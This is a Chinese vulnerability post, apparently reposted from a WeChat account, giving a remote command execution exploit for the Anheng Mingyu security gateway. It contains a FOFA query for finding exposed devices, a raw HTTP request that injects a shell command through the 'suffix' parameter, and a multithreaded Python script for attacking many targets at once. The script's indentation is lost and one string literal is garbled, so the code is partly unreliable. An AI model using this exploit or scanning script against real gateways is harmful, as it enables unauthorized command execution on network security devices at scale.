安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞
FOFA:body="/webui/images/basic/login/" && title=="明御安全网关"
复现步骤
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
命令执行结果文件的访问路径(命令输出被重定向到 /usr/local/webui/test.txt):http://www.example.com/test.txt
批量脚本
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Time : 2023/8/15 18:28
# Author : yunkong
# FileName : DAS_Gateway_Rce.py
# Description: 安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞
import argparse
import requests
import concurrent.futures
import logging
# Timestamped INFO-level logging: each probed target produces one log line.
logging.basicConfig(
    format='%(asctime)s - %(levelname)s - %(message)s',
    level=logging.INFO,
)

# Local intercepting-proxy endpoint, the same listener for both schemes.
# Nothing in the visible script hands it to requests: its only reference,
# the `proxies=proxy` argument in send_get_request, is commented out.
proxy = dict.fromkeys(("http", "https"), "127.0.0.1:8080")
def send_get_request(url):
# Send the single probe request for this issue to `url` and log the outcome.
#
# url: base URL of the target, interpolated into the request URL unchanged
#      (the usage notes on this page pass it as scheme + host).
# Returns nothing; the result is reported through logging only.
#
# NOTE(review): indentation was lost in this listing, so the nesting of the
# statements below (in particular `pass` / `logging.error` after `else`)
# cannot be recovered with certainty; the code is left exactly as extracted.
#
# Request shape, usable as a web-log search indicator: a GET to /webui/ with
# g=aaa_portal_auth_local_submit whose `suffix` parameter holds a
# {urlenc(...)} expression wrapping a backtick-quoted shell command. The
# doubled braces in the f-string emit a literal `{` and `}`.
# The command redirects the output of `id` to /usr/local/webui/test.txt and
# nothing in this function removes that file afterwards, so a leftover
# test.txt at that path is a host-side artifact of the probe.
exploit_url = f"{url}/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix={{urlenc(`id+>/usr/local/webui/test.txt`)}}"
# Fixed browser-like headers; the User-Agent is constant for every request
# and identical to the one in the raw request shown on this page.
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/35.0.1916.47 Safari/537.36",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded",
"Accept-Encoding": "gzip",
}
try:
# A fresh Session is opened per call and closed by the context manager.
with requests.Session() as session:
response = session.get(exploit_url,
# proxies=proxy,
headers=headers
)
# The outcome is inferred only from HTTP 200 plus a marker substring in the
# response body; the written file is never fetched, so the "Successful"
# log line does not by itself confirm that the command ran.
# NOTE(review): the quoting of the marker literal on the next line looks
# garbled by extraction (nested double quotes) and does not parse as written.
if response.status_code == 200 and ""success":"local_logo"" in response.text:
logging.info(f"[+] Successful exploit, result: {url}/test.txt")
else:
pass
logging.error(f"[-] Failed exploit, result: {url}")
# Transport-level failures are logged per target; the exception detail `e`
# is bound but not included in the message.
except requests.exceptions.RequestException as e:
logging.error(f"[-] HTTP request failed, result: {url}")
def main():
# Parse the command line and run the probe against one URL (-u) or against
# every URL listed in a file (-U); with neither option, print the help text.
# NOTE(review): indentation was lost in this listing; the code is left
# exactly as extracted.
parser = argparse.ArgumentParser(description="Exploit script for target URLs")
parser.add_argument("-u", "--url", help="Single target URL")
parser.add_argument("-U", "--url-file", help="File containing multiple target URLs")
args = parser.parse_args()
# -u takes precedence: when both options are given, the file is ignored.
if args.url:
send_get_request(args.url)
elif args.url_file:
# One target per line. Lines are stripped but blank lines are not filtered,
# so an empty line is handed to send_get_request as an empty URL.
with open(args.url_file, 'r') as url_file:
url_list = [line.strip() for line in url_file]
# Up to five requests are in flight at once. Seen from the network, batch
# mode is the same request line repeated against many hosts from one source.
# The iterator returned by executor.map is discarded, so an exception that
# escapes send_get_request is never surfaced here.
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
executor.map(send_get_request, url_list)
else:
parser.print_help()
# Run main() only when the file is executed as a script, not when imported.
if __name__ == '__main__':
main()
使用方法
# 单个目标
python example.py -u http://example.com
# 多个目标
python example.py -U file_path
原文始发于微信公众号(贫僧法号云空):安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞